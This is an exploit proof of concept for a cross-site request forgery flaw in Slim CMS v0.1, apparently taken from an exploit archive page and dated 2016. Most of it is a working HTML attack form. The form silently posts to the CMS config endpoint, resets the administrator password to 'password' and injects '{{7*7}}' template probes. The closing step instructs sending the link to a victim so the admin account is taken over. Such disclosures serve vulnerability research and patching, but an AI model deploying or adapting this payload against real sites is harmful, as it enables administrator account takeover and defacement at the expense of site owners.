45 lines
No EOL
1.7 KiB
HTML
45 lines
No EOL
1.7 KiB
HTML
<!--
|
|
# Exploit Title: CSRF Vulnerability on Slim CMS v0.1
|
|
# CMS Link: https://github.com/revuls/SlimCMS/releases
|
|
# Date: 16th June'2016
|
|
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
|
|
# Vendor Homepage: http://www.slimcms.nl/
|
|
# Software Link: https://github.com/revuls/SlimCMS/releases
|
|
# Version: Slim CMSv0.1
|
|
# Tested on: Windows 10, XAMPP
|
|
# Twitter: https://twitter.com/m_avinash143
|
|
|
|
|
|
CSRF : Cross-Site Request Forgery (CSRF) is a type of attack that occurs when a malicious web site, email, blog, instant message, or program causes a user's web browser to perform an unwanted action on a trusted site for which the user is currently authenticated.
|
|
|
|
|
|
Vulnerability Description :
|
|
It is possible to change the password of the administrator and complete account can be take over using this.
|
|
|
|
Steps to Reproduce the same
|
|
|
|
1. Login into the account.
|
|
2. Navigate to http://localhost/SlimCMS/admin/config
|
|
3. Fill the details and intecept the request using BurpSuite
|
|
|
|
Request Intercepted
|
|
-------------------
|
|
-->
|
|
|
|
<html>
|
|
<body>
|
|
<form action="http://localhost/SlimCMS/api/config" method="POST">
|
|
<input type="hidden" name="title" value="{{7*7}}" />
|
|
<input type="hidden" name="description" value="{{7*7}}" />
|
|
<input type="hidden" name="user" value="admin" />
|
|
<input type="hidden" name="password" value="password" />
|
|
<input type="hidden" name="theme" value="default" />
|
|
<input type="hidden" name="url" value="http://localhost/SlimCMS" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
<!--
|
|
4. Send the link to victim and password will be changed for the admin user (Once the victim's clicks on the URL).
|
|
--> |